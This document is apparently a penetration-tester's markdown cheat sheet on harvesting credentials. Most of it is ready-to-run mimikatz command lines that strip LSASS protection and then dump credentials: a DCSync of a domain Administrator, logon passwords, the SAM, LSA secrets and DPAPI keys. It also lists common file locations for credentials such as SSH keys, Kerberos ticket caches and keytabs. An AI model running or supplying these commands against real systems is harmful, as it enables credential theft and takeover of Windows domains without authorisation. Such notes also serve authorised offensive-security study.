# Credentials

#### From File

```
C:\program files\xxx\mail.ps1

C:\inetpub\wwwroot\loginform.aspx
```

#### Dcsync

```
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "lsadump::dcsync /domain:red.com /user:red\Administrator"exit
```

#### logonpasswords

```
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "sekurlsa::logonpasswords"exit
```

#### SAM

```
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "token::elevate" "lsadump::sam"exit
```

#### Secret

```
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "token::elevate" "lsadump::secrets"exit
```

#### DPAPI

```
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "sekurlsa::dpapi"exit
```

#### SSH Key

* id\_rsa: Could be other user's.
* authorized\_keys
* known\_hosts

#### Ansible

```
/opt/web.yml
```

#### Jfrog

#### ccache

```
/tmp/krb5cc_alice
```

#### keytab

/etc/krb5.keytab